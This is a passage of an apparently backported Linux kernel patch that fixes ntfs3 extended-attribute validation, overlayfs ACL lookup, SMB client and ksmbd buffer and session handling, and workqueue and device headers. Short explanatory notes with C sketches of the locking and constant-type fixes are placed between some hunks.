++	for (; *off < bytes; *off += ea_size) {
+ 		const struct EA_FULL *ea = Add2Ptr(ea_all, *off);
+-		u32 next_off = *off + unpacked_ea_size(ea);
+-
+-		if (next_off > bytes)
+-			return false;
+-
++		ea_size = unpacked_ea_size(ea);
+ 		if (ea->name_len == name_len &&
+-		    !memcmp(ea->name, name, name_len))
++		    !memcmp(ea->name, name, name_len)) {
++			if (ea_sz)
++				*ea_sz = ea_size;
+ 			return true;
+-
+-		*off = next_off;
+-		if (next_off >= bytes)
+-			return false;
++		}
+ 	}
++
++	return false;
+ }
+ 
+ /*
+@@ -74,12 +72,12 @@ static inline bool find_ea(const struct EA_FULL *ea_all, u32 bytes,
+ static int ntfs_read_ea(struct ntfs_inode *ni, struct EA_FULL **ea,
+ 			size_t add_bytes, const struct EA_INFO **info)
+ {
+-	int err;
++	int err = -EINVAL;
+ 	struct ntfs_sb_info *sbi = ni->mi.sbi;
+ 	struct ATTR_LIST_ENTRY *le = NULL;
+ 	struct ATTRIB *attr_info, *attr_ea;
+ 	void *ea_p;
+-	u32 size;
++	u32 size, off, ea_size;
+ 
+ 	static_assert(le32_to_cpu(ATTR_EA_INFO) < le32_to_cpu(ATTR_EA));
+ 
+@@ -96,24 +94,31 @@ static int ntfs_read_ea(struct ntfs_inode *ni, struct EA_FULL **ea,
+ 
+ 	*info = resident_data_ex(attr_info, sizeof(struct EA_INFO));
+ 	if (!*info)
+-		return -EINVAL;
++		goto out;
+ 
+ 	/* Check Ea limit. */
+ 	size = le32_to_cpu((*info)->size);
+-	if (size > sbi->ea_max_size)
+-		return -EFBIG;
++	if (size > sbi->ea_max_size) {
++		err = -EFBIG;
++		goto out;
++	}
++
++	if (attr_size(attr_ea) > sbi->ea_max_size) {
++		err = -EFBIG;
++		goto out;
++	}
+ 
+-	if (attr_size(attr_ea) > sbi->ea_max_size)
+-		return -EFBIG;
++	if (!size) {
++		/* EA info persists, but xattr is empty. Looks like an EA problem. */
++		goto out;
++	}
+ 
+ 	/* Allocate memory for packed Ea. */
+ 	ea_p = kmalloc(size_add(size, add_bytes), GFP_NOFS);
+ 	if (!ea_p)
+ 		return -ENOMEM;
+ 
+-	if (!size) {
+-		/* EA info persists, but xattr is empty. Looks like EA problem. */
+-	} else if (attr_ea->non_res) {
++	if (attr_ea->non_res) {
+ 		struct runs_tree run;
+ 
+ 		run_init(&run);
+@@ -124,24 +129,52 @@ static int ntfs_read_ea(struct ntfs_inode *ni, struct EA_FULL **ea,
+ 		run_close(&run);
+ 
+ 		if (err)
+-			goto out;
++			goto out1;
+ 	} else {
+ 		void *p = resident_data_ex(attr_ea, size);
+ 
+-		if (!p) {
+-			err = -EINVAL;
+-			goto out;
+-		}
++		if (!p)
++			goto out1;
+ 		memcpy(ea_p, p, size);
+ 	}
+ 
+ 	memset(Add2Ptr(ea_p, size), 0, add_bytes);
++
++	/* Check all attributes for consistency. */
++	for (off = 0; off < size; off += ea_size) {
++		const struct EA_FULL *ef = Add2Ptr(ea_p, off);
++		u32 bytes = size - off;
++
++		/* Check if we can use field ea->size. */
++		if (bytes < sizeof(ef->size))
++			goto out1;
++
++		if (ef->size) {
++			ea_size = le32_to_cpu(ef->size);
++			if (ea_size > bytes)
++				goto out1;
++			continue;
++		}
++
++		/* Check if we can use fields ef->name_len and ef->elength. */
++		if (bytes < offsetof(struct EA_FULL, name))
++			goto out1;
++
++		ea_size = ALIGN(struct_size(ef, name,
++					    1 + ef->name_len +
++						    le16_to_cpu(ef->elength)),
++				4);
++		if (ea_size > bytes)
++			goto out1;
++	}
++
+ 	*ea = ea_p;
+ 	return 0;
+ 
+-out:
++out1:
+ 	kfree(ea_p);
+-	*ea = NULL;
++out:
++	ntfs_set_state(sbi, NTFS_DIRTY_DIRTY);
+ 	return err;
+ }
+ 
+@@ -163,6 +196,7 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 	const struct EA_FULL *ea;
+ 	u32 off, size;
+ 	int err;
++	int ea_size;
+ 	size_t ret;
+ 
+ 	err = ntfs_read_ea(ni, &ea_all, 0, &info);
+@@ -175,8 +209,9 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 	size = le32_to_cpu(info->size);
+ 
+ 	/* Enumerate all xattrs. */
+-	for (ret = 0, off = 0; off < size; off += unpacked_ea_size(ea)) {
++	for (ret = 0, off = 0; off < size; off += ea_size) {
+ 		ea = Add2Ptr(ea_all, off);
++		ea_size = unpacked_ea_size(ea);
+ 
+ 		if (!ea->name_len)
+ 			break;
+@@ -230,7 +265,8 @@ static int ntfs_get_ea(struct inode *inode, const char *name, size_t name_len,
+ 		goto out;
+ 
+ 	/* Enumerate all xattrs. */
+-	if (!find_ea(ea_all, le32_to_cpu(info->size), name, name_len, &off)) {
++	if (!find_ea(ea_all, le32_to_cpu(info->size), name, name_len, &off,
++		     NULL)) {
+ 		err = -ENODATA;
+ 		goto out;
+ 	}
+@@ -272,7 +308,7 @@ static noinline int ntfs_set_ea(struct inode *inode, const char *name,
+ 	struct EA_FULL *new_ea;
+ 	struct EA_FULL *ea_all = NULL;
+ 	size_t add, new_pack;
+-	u32 off, size;
++	u32 off, size, ea_sz;
+ 	__le16 size_pack;
+ 	struct ATTRIB *attr;
+ 	struct ATTR_LIST_ENTRY *le;
+@@ -307,9 +343,8 @@ static noinline int ntfs_set_ea(struct inode *inode, const char *name,
+ 		size_pack = ea_info.size_pack;
+ 	}
+ 
+-	if (info && find_ea(ea_all, size, name, name_len, &off)) {
++	if (info && find_ea(ea_all, size, name, name_len, &off, &ea_sz)) {
+ 		struct EA_FULL *ea;
+-		size_t ea_sz;
+ 
+ 		if (flags & XATTR_CREATE) {
+ 			err = -EEXIST;
+@@ -332,8 +367,6 @@ static noinline int ntfs_set_ea(struct inode *inode, const char *name,
+ 		if (ea->flags & FILE_NEED_EA)
+ 			le16_add_cpu(&ea_info.count, -1);
+ 
+-		ea_sz = unpacked_ea_size(ea);
+-
+ 		le16_add_cpu(&ea_info.size_pack, 0 - packed_ea_size(ea));
+ 
+ 		memmove(ea, Add2Ptr(ea, ea_sz), size - off - ea_sz);
+diff --git a/fs/overlayfs/inode.c b/fs/overlayfs/inode.c
+index 9e61511de7a7c..677649b349658 100644
+--- a/fs/overlayfs/inode.c
++++ b/fs/overlayfs/inode.c
+@@ -497,20 +497,20 @@ static void ovl_idmap_posix_acl(struct inode *realinode,
+  */
+ struct posix_acl *ovl_get_acl(struct inode *inode, int type, bool rcu)
+ {
+-	struct inode *realinode = ovl_inode_real(inode);
++	struct inode *realinode;
+ 	struct posix_acl *acl, *clone;
+ 	struct path realpath;
+ 
+-	if (!IS_POSIXACL(realinode))
+-		return NULL;
+-
+ 	/* Careful in RCU walk mode */
+-	ovl_i_path_real(inode, &realpath);
+-	if (!realpath.dentry) {
++	realinode = ovl_i_path_real(inode, &realpath);
++	if (!realinode) {
+ 		WARN_ON(!rcu);
+ 		return ERR_PTR(-ECHILD);
+ 	}
+ 
++	if (!IS_POSIXACL(realinode))
++		return NULL;
++
+ 	if (rcu) {
+ 		acl = get_cached_acl_rcu(realinode, type);
+ 	} else {
+diff --git a/fs/overlayfs/overlayfs.h b/fs/overlayfs/overlayfs.h
+index 052226aa7de09..a3c59ac015ee6 100644
+--- a/fs/overlayfs/overlayfs.h
++++ b/fs/overlayfs/overlayfs.h
+@@ -369,7 +369,7 @@ enum ovl_path_type ovl_path_type(struct dentry *dentry);
+ void ovl_path_upper(struct dentry *dentry, struct path *path);
+ void ovl_path_lower(struct dentry *dentry, struct path *path);
+ void ovl_path_lowerdata(struct dentry *dentry, struct path *path);
+-void ovl_i_path_real(struct inode *inode, struct path *path);
++struct inode *ovl_i_path_real(struct inode *inode, struct path *path);
+ enum ovl_path_type ovl_path_real(struct dentry *dentry, struct path *path);
+ enum ovl_path_type ovl_path_realdata(struct dentry *dentry, struct path *path);
+ struct dentry *ovl_dentry_upper(struct dentry *dentry);
+diff --git a/fs/overlayfs/util.c b/fs/overlayfs/util.c
+index 850e8d1bf8296..0d8f96168e6cf 100644
+--- a/fs/overlayfs/util.c
++++ b/fs/overlayfs/util.c
+@@ -266,7 +266,7 @@ struct dentry *ovl_i_dentry_upper(struct inode *inode)
+ 	return ovl_upperdentry_dereference(OVL_I(inode));
+ }
+ 
+-void ovl_i_path_real(struct inode *inode, struct path *path)
++struct inode *ovl_i_path_real(struct inode *inode, struct path *path)
+ {
+ 	path->dentry = ovl_i_dentry_upper(inode);
+ 	if (!path->dentry) {
+@@ -275,6 +275,8 @@ void ovl_i_path_real(struct inode *inode, struct path *path)
+ 	} else {
+ 		path->mnt = ovl_upper_mnt(OVL_FS(inode->i_sb));
+ 	}
++
++	return path->dentry ? d_inode_rcu(path->dentry) : NULL;
+ }
+ 
+ struct inode *ovl_inode_upper(struct inode *inode)
+@@ -1121,8 +1123,7 @@ void ovl_copyattr(struct inode *inode)
+ 	struct inode *realinode;
+ 	struct user_namespace *real_mnt_userns;
+ 
+-	ovl_i_path_real(inode, &realpath);
+-	realinode = d_inode(realpath.dentry);
++	realinode = ovl_i_path_real(inode, &realpath);
+ 	real_mnt_userns = mnt_user_ns(realpath.mnt);
+ 
+ 	inode->i_uid = i_uid_into_mnt(real_mnt_userns, realinode);
+diff --git a/fs/smb/client/file.c b/fs/smb/client/file.c
+index 9a367d4c74e47..27c6d14e369f1 100644
+--- a/fs/smb/client/file.c
++++ b/fs/smb/client/file.c
+@@ -954,8 +954,8 @@ int cifs_close(struct inode *inode, struct file *file)
+ 		cfile = file->private_data;
+ 		file->private_data = NULL;
+ 		dclose = kmalloc(sizeof(struct cifs_deferred_close), GFP_KERNEL);
+-		if ((cinode->oplock == CIFS_CACHE_RHW_FLG) &&
+-		    cinode->lease_granted &&
++		if ((cifs_sb->ctx->closetimeo && cinode->oplock == CIFS_CACHE_RHW_FLG)
++		    && cinode->lease_granted &&
+ 		    !test_bit(CIFS_INO_CLOSE_ON_LOCK, &cinode->flags) &&
+ 		    dclose) {
+ 			if (test_and_clear_bit(CIFS_INO_MODIFIED_ATTR, &cinode->flags)) {
+diff --git a/fs/smb/client/smb2transport.c b/fs/smb/client/smb2transport.c
+index 790acf65a0926..22954a9c7a6c7 100644
+--- a/fs/smb/client/smb2transport.c
++++ b/fs/smb/client/smb2transport.c
+@@ -153,7 +153,14 @@ smb2_find_smb_ses_unlocked(struct TCP_Server_Info *server, __u64 ses_id)
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+ 		if (ses->Suid != ses_id)
+ 			continue;
++
++		spin_lock(&ses->ses_lock);
++		if (ses->ses_status == SES_EXITING) {
++			spin_unlock(&ses->ses_lock);
++			continue;
++		}
+ 		++ses->ses_count;
++		spin_unlock(&ses->ses_lock);
+ 		return ses;
+ 	}
+ 
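
The smb2transport.c hunk above closes a use-after-free window: the session's state is tested and its refcount bumped under the same ses_lock, so a session in SES_EXITING can never be handed back to the caller. A generic sketch of that check-then-get pattern (names are illustrative, not cifs API):

#include <pthread.h>
#include <stdbool.h>

#define SES_EXITING	1

struct session {
	pthread_mutex_t lock;
	int status;			/* e.g. 0 = good, SES_EXITING */
	int refcount;
};

/* Take a reference only while the object is still live; the state
 * test and the increment happen under one lock, leaving no window
 * for teardown to slip in between. */
static bool session_tryget(struct session *ses)
{
	bool ok;

	pthread_mutex_lock(&ses->lock);
	ok = (ses->status != SES_EXITING);
	if (ok)
		ses->refcount++;
	pthread_mutex_unlock(&ses->lock);
	return ok;
}
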
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 2b7c0ba6a77de..26cf73d664f94 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -1339,9 +1339,8 @@ static int decode_negotiation_token(struct ksmbd_conn *conn,
+ 
+ static int ntlm_negotiate(struct ksmbd_work *work,
+ 			  struct negotiate_message *negblob,
+-			  size_t negblob_len)
++			  size_t negblob_len, struct smb2_sess_setup_rsp *rsp)
+ {
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+ 	struct challenge_message *chgblob;
+ 	unsigned char *spnego_blob = NULL;
+ 	u16 spnego_blob_len;
+@@ -1446,10 +1445,10 @@ static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
+ 	return user;
+ }
+ 
+-static int ntlm_authenticate(struct ksmbd_work *work)
++static int ntlm_authenticate(struct ksmbd_work *work,
++			     struct smb2_sess_setup_req *req,
++			     struct smb2_sess_setup_rsp *rsp)
+ {
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct ksmbd_session *sess = work->sess;
+ 	struct channel *chann = NULL;
+@@ -1582,10 +1581,10 @@ binding_session:
+ }
+ 
+ #ifdef CONFIG_SMB_SERVER_KERBEROS5
+-static int krb5_authenticate(struct ksmbd_work *work)
++static int krb5_authenticate(struct ksmbd_work *work,
++			     struct smb2_sess_setup_req *req,
++			     struct smb2_sess_setup_rsp *rsp)
+ {
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct ksmbd_session *sess = work->sess;
+ 	char *in_blob, *out_blob;
+@@ -1662,7 +1661,9 @@ static int krb5_authenticate(struct ksmbd_work *work)
+ 	return 0;
+ }
+ #else
+-static int krb5_authenticate(struct ksmbd_work *work)
++static int krb5_authenticate(struct ksmbd_work *work,
++			     struct smb2_sess_setup_req *req,
++			     struct smb2_sess_setup_rsp *rsp)
+ {
+ 	return -EOPNOTSUPP;
+ }
+@@ -1671,8 +1672,8 @@ static int krb5_authenticate(struct ksmbd_work *work)
+ int smb2_sess_setup(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_sess_setup_req *req;
++	struct smb2_sess_setup_rsp *rsp;
+ 	struct ksmbd_session *sess;
+ 	struct negotiate_message *negblob;
+ 	unsigned int negblob_len, negblob_off;
+@@ -1680,6 +1681,8 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Received request for session setup\n");
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	rsp->StructureSize = cpu_to_le16(9);
+ 	rsp->SessionFlags = 0;
+ 	rsp->SecurityBufferOffset = cpu_to_le16(72);
+@@ -1801,7 +1804,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 
+ 		if (conn->preferred_auth_mech &
+ 				(KSMBD_AUTH_KRB5 | KSMBD_AUTH_MSKRB5)) {
+-			rc = krb5_authenticate(work);
++			rc = krb5_authenticate(work, req, rsp);
+ 			if (rc) {
+ 				rc = -EINVAL;
+ 				goto out_err;
+@@ -1815,7 +1818,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			sess->Preauth_HashValue = NULL;
+ 		} else if (conn->preferred_auth_mech == KSMBD_AUTH_NTLMSSP) {
+ 			if (negblob->MessageType == NtLmNegotiate) {
+-				rc = ntlm_negotiate(work, negblob, negblob_len);
++				rc = ntlm_negotiate(work, negblob, negblob_len, rsp);
+ 				if (rc)
+ 					goto out_err;
+ 				rsp->hdr.Status =
+@@ -1828,7 +1831,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 						le16_to_cpu(rsp->SecurityBufferLength) - 1);
+ 
+ 			} else if (negblob->MessageType == NtLmAuthenticate) {
+-				rc = ntlm_authenticate(work);
++				rc = ntlm_authenticate(work, req, rsp);
+ 				if (rc)
+ 					goto out_err;
+ 
+@@ -1926,14 +1929,16 @@ out_err:
+ int smb2_tree_connect(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_tree_connect_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_tree_connect_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_tree_connect_req *req;
++	struct smb2_tree_connect_rsp *rsp;
+ 	struct ksmbd_session *sess = work->sess;
+ 	char *treename = NULL, *name = NULL;
+ 	struct ksmbd_tree_conn_status status;
+ 	struct ksmbd_share_config *share;
+ 	int rc = -EINVAL;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	treename = smb_strndup_from_utf16(req->Buffer,
+ 					  le16_to_cpu(req->PathLength), true,
+ 					  conn->local_nls);
+@@ -2102,19 +2107,19 @@ static int smb2_create_open_flags(bool file_present, __le32 access,
+  */
+ int smb2_tree_disconnect(struct ksmbd_work *work)
+ {
+-	struct smb2_tree_disconnect_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_tree_disconnect_rsp *rsp;
++	struct smb2_tree_disconnect_req *req;
+ 	struct ksmbd_session *sess = work->sess;
+ 	struct ksmbd_tree_connect *tcon = work->tcon;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	inc_rfc1001_len(work->response_buf, 4);
+ 
+ 	ksmbd_debug(SMB, "request\n");
+ 
+ 	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
+-		struct smb2_tree_disconnect_req *req =
+-			smb2_get_msg(work->request_buf);
+-
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+ 
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+@@ -2137,10 +2142,14 @@ int smb2_tree_disconnect(struct ksmbd_work *work)
+ int smb2_session_logoff(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_logoff_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_logoff_req *req;
++	struct smb2_logoff_rsp *rsp;
+ 	struct ksmbd_session *sess;
+-	struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
+-	u64 sess_id = le64_to_cpu(req->hdr.SessionId);
++	u64 sess_id;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	sess_id = le64_to_cpu(req->hdr.SessionId);
+ 
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	inc_rfc1001_len(work->response_buf, 4);
+@@ -2180,12 +2189,14 @@ int smb2_session_logoff(struct ksmbd_work *work)
+  */
+ static noinline int create_smb2_pipe(struct ksmbd_work *work)
+ {
+-	struct smb2_create_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct smb2_create_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_create_rsp *rsp;
++	struct smb2_create_req *req;
+ 	int id;
+ 	int err;
+ 	char *name;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	name = smb_strndup_from_utf16(req->Buffer, le16_to_cpu(req->NameLength),
+ 				      1, work->conn->local_nls);
+ 	if (IS_ERR(name)) {
+@@ -5321,8 +5332,10 @@ int smb2_query_info(struct ksmbd_work *work)
+ static noinline int smb2_close_pipe(struct ksmbd_work *work)
+ {
+ 	u64 id;
+-	struct smb2_close_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_close_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_close_req *req;
++	struct smb2_close_rsp *rsp;
++
++	WORK_BUFFERS(work, req, rsp);
+ 
+ 	id = req->VolatileFileId;
+ 	ksmbd_session_rpc_close(work->sess, id);
+@@ -5464,6 +5477,9 @@ int smb2_echo(struct ksmbd_work *work)
+ {
+ 	struct smb2_echo_rsp *rsp = smb2_get_msg(work->response_buf);
+ 
++	if (work->next_smb2_rcv_hdr_off)
++		rsp = ksmbd_resp_buf_next(work);
++
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	rsp->Reserved = 0;
+ 	inc_rfc1001_len(work->response_buf, 4);
+@@ -6178,8 +6194,10 @@ static noinline int smb2_read_pipe(struct ksmbd_work *work)
+ 	int nbytes = 0, err;
+ 	u64 id;
+ 	struct ksmbd_rpc_command *rpc_resp;
+-	struct smb2_read_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_read_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_read_req *req;
++	struct smb2_read_rsp *rsp;
++
++	WORK_BUFFERS(work, req, rsp);
+ 
+ 	id = req->VolatileFileId;
+ 
+@@ -6427,14 +6445,16 @@ out:
+  */
+ static noinline int smb2_write_pipe(struct ksmbd_work *work)
+ {
+-	struct smb2_write_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_write_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_write_req *req;
++	struct smb2_write_rsp *rsp;
+ 	struct ksmbd_rpc_command *rpc_resp;
+ 	u64 id = 0;
+ 	int err = 0, ret = 0;
+ 	char *data_buf;
+ 	size_t length;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	length = le32_to_cpu(req->Length);
+ 	id = req->VolatileFileId;
+ 
+@@ -6703,6 +6723,9 @@ int smb2_cancel(struct ksmbd_work *work)
+ 	struct ksmbd_work *iter;
+ 	struct list_head *command_list;
+ 
++	if (work->next_smb2_rcv_hdr_off)
++		hdr = ksmbd_resp_buf_next(work);
++
+ 	ksmbd_debug(SMB, "smb2 cancel called on mid %llu, async flags 0x%x\n",
+ 		    hdr->MessageId, hdr->Flags);
+ 
+@@ -6862,8 +6885,8 @@ static inline bool lock_defer_pending(struct file_lock *fl)
+  */
+ int smb2_lock(struct ksmbd_work *work)
+ {
+-	struct smb2_lock_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_lock_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_lock_req *req;
++	struct smb2_lock_rsp *rsp;
+ 	struct smb2_lock_element *lock_ele;
+ 	struct ksmbd_file *fp = NULL;
+ 	struct file_lock *flock = NULL;
+@@ -6880,6 +6903,8 @@ int smb2_lock(struct ksmbd_work *work)
+ 	LIST_HEAD(rollback_list);
+ 	int prior_lock = 0;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	ksmbd_debug(SMB, "Received lock request\n");
+ 	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
+ 	if (!fp) {
+@@ -7992,8 +8017,8 @@ out:
+  */
+ static void smb20_oplock_break_ack(struct ksmbd_work *work)
+ {
+-	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
+-	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_oplock_break *req;
++	struct smb2_oplock_break *rsp;
+ 	struct ksmbd_file *fp;
+ 	struct oplock_info *opinfo = NULL;
+ 	__le32 err = 0;
+@@ -8002,6 +8027,8 @@ static void smb20_oplock_break_ack(struct ksmbd_work *work)
+ 	char req_oplevel = 0, rsp_oplevel = 0;
+ 	unsigned int oplock_change_type;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	volatile_id = req->VolatileFid;
+ 	persistent_id = req->PersistentFid;
+ 	req_oplevel = req->OplockLevel;
+@@ -8136,8 +8163,8 @@ static int check_lease_state(struct lease *lease, __le32 req_state)
+ static void smb21_lease_break_ack(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_lease_ack *req = smb2_get_msg(work->request_buf);
+-	struct smb2_lease_ack *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_lease_ack *req;
++	struct smb2_lease_ack *rsp;
+ 	struct oplock_info *opinfo;
+ 	__le32 err = 0;
+ 	int ret = 0;
+@@ -8145,6 +8172,8 @@ static void smb21_lease_break_ack(struct ksmbd_work *work)
+ 	__le32 lease_state;
+ 	struct lease *lease;
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	ksmbd_debug(OPLOCK, "smb21 lease break, lease state(0x%x)\n",
+ 		    le32_to_cpu(req->LeaseState));
+ 	opinfo = lookup_lease_in_table(conn, req->LeaseKey);
+@@ -8270,8 +8299,10 @@ err_out:
+  */
+ int smb2_oplock_break(struct ksmbd_work *work)
+ {
+-	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
+-	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_oplock_break *req;
++	struct smb2_oplock_break *rsp;
++
++	WORK_BUFFERS(work, req, rsp);
+ 
+ 	switch (le16_to_cpu(req->StructureSize)) {
+ 	case OP_BREAK_STRUCT_SIZE_20:
+diff --git a/include/linux/blk-crypto-profile.h b/include/linux/blk-crypto-profile.h
+index e6802b69cdd64..90ab33cb5d0ef 100644
+--- a/include/linux/blk-crypto-profile.h
++++ b/include/linux/blk-crypto-profile.h
+@@ -111,6 +111,7 @@ struct blk_crypto_profile {
+ 	 * keyslots while ensuring that they can't be changed concurrently.
+ 	 */
+ 	struct rw_semaphore lock;
++	struct lock_class_key lockdep_key;
+ 
+ 	/* List of idle slots, with least recently used slot at front */
+ 	wait_queue_head_t idle_slots_wait_queue;
+diff --git a/include/linux/nvme.h b/include/linux/nvme.h
+index d9fbc5afeaf72..e6fb36b71b59d 100644
+--- a/include/linux/nvme.h
++++ b/include/linux/nvme.h
+@@ -473,7 +473,7 @@ struct nvme_id_ns_nvm {
+ };
+ 
+ enum {
+-	NVME_ID_NS_NVM_STS_MASK		= 0x3f,
++	NVME_ID_NS_NVM_STS_MASK		= 0x7f,
+ 	NVME_ID_NS_NVM_GUARD_SHIFT	= 7,
+ 	NVME_ID_NS_NVM_GUARD_MASK	= 0x3,
+ };
+diff --git a/include/linux/rethook.h b/include/linux/rethook.h
+index c8ac1e5afcd1d..bdbe6717f45a2 100644
+--- a/include/linux/rethook.h
++++ b/include/linux/rethook.h
+@@ -59,6 +59,7 @@ struct rethook_node {
+ };
+ 
+ struct rethook *rethook_alloc(void *data, rethook_handler_t handler);
++void rethook_stop(struct rethook *rh);
+ void rethook_free(struct rethook *rh);
+ void rethook_add_node(struct rethook *rh, struct rethook_node *node);
+ struct rethook_node *rethook_try_get(struct rethook *rh);
+diff --git a/include/linux/serial_8250.h b/include/linux/serial_8250.h
+index 19376bee96676..79b328861c5fa 100644
+--- a/include/linux/serial_8250.h
++++ b/include/linux/serial_8250.h
+@@ -98,7 +98,6 @@ struct uart_8250_port {
+ 	struct list_head	list;		/* ports on this IRQ */
+ 	u32			capabilities;	/* port capabilities */
+ 	unsigned short		bugs;		/* port bugs */
+-	bool			fifo_bug;	/* min RX trigger if enabled */
+ 	unsigned int		tx_loadsz;	/* transmit fifo load size */
+ 	unsigned char		acr;
+ 	unsigned char		fcr;
+diff --git a/include/linux/workqueue.h b/include/linux/workqueue.h
+index a0143dd244300..3ca41b9da6473 100644
+--- a/include/linux/workqueue.h
++++ b/include/linux/workqueue.h
+@@ -68,7 +68,6 @@ enum {
+ 	WORK_OFFQ_FLAG_BASE	= WORK_STRUCT_COLOR_SHIFT,
+ 
+ 	__WORK_OFFQ_CANCELING	= WORK_OFFQ_FLAG_BASE,
+-	WORK_OFFQ_CANCELING	= (1 << __WORK_OFFQ_CANCELING),
+ 
+ 	/*
+ 	 * When a work item is off queue, its high bits point to the last
+@@ -79,12 +78,6 @@ enum {
+ 	WORK_OFFQ_POOL_SHIFT	= WORK_OFFQ_FLAG_BASE + WORK_OFFQ_FLAG_BITS,
+ 	WORK_OFFQ_LEFT		= BITS_PER_LONG - WORK_OFFQ_POOL_SHIFT,
+ 	WORK_OFFQ_POOL_BITS	= WORK_OFFQ_LEFT <= 31 ? WORK_OFFQ_LEFT : 31,
+-	WORK_OFFQ_POOL_NONE	= (1LU << WORK_OFFQ_POOL_BITS) - 1,
+-
+-	/* convenience constants */
+-	WORK_STRUCT_FLAG_MASK	= (1UL << WORK_STRUCT_FLAG_BITS) - 1,
+-	WORK_STRUCT_WQ_DATA_MASK = ~WORK_STRUCT_FLAG_MASK,
+-	WORK_STRUCT_NO_POOL	= (unsigned long)WORK_OFFQ_POOL_NONE << WORK_OFFQ_POOL_SHIFT,
+ 
+ 	/* bit mask for work_busy() return values */
+ 	WORK_BUSY_PENDING	= 1 << 0,
+@@ -94,6 +87,14 @@ enum {
+ 	WORKER_DESC_LEN		= 24,
+ };
+ 
++/* Convenience constants - of type 'unsigned long', not 'enum'! */
++#define WORK_OFFQ_CANCELING	(1ul << __WORK_OFFQ_CANCELING)
++#define WORK_OFFQ_POOL_NONE	((1ul << WORK_OFFQ_POOL_BITS) - 1)
++#define WORK_STRUCT_NO_POOL	(WORK_OFFQ_POOL_NONE << WORK_OFFQ_POOL_SHIFT)
++
++#define WORK_STRUCT_FLAG_MASK    ((1ul << WORK_STRUCT_FLAG_BITS) - 1)
++#define WORK_STRUCT_WQ_DATA_MASK (~WORK_STRUCT_FLAG_MASK)
++
+ struct work_struct {
+ 	atomic_long_t data;
+ 	struct list_head entry;
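
The workqueue.h hunk works around a C language limit: enumerator values must be representable as an int, so 'unsigned long' masks such as WORK_STRUCT_NO_POOL (a value shifted past bit 31 on 64-bit builds) cannot live in the enum and become macros instead. A stand-alone illustration - the shift widths here are invented for the example, not the kernel's real layout:

#include <stdio.h>

#define POOL_BITS	31
#define POOL_SHIFT	27			/* hypothetical */

#define POOL_NONE	((1ul << POOL_BITS) - 1)
#define NO_POOL		(POOL_NONE << POOL_SHIFT)	/* ~2^58 on LP64 */

int main(void)
{
	/* Fine as a macro of type unsigned long; as an enumerator this
	 * constant would not fit in an int. */
	printf("NO_POOL = %#lx\n", NO_POOL);
	return 0;
}
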
+diff --git a/include/net/pkt_sched.h b/include/net/pkt_sched.h
+index 8ab75128512ab..f99a513b40a92 100644
+--- a/include/net/pkt_sched.h
++++ b/include/net/pkt_sched.h
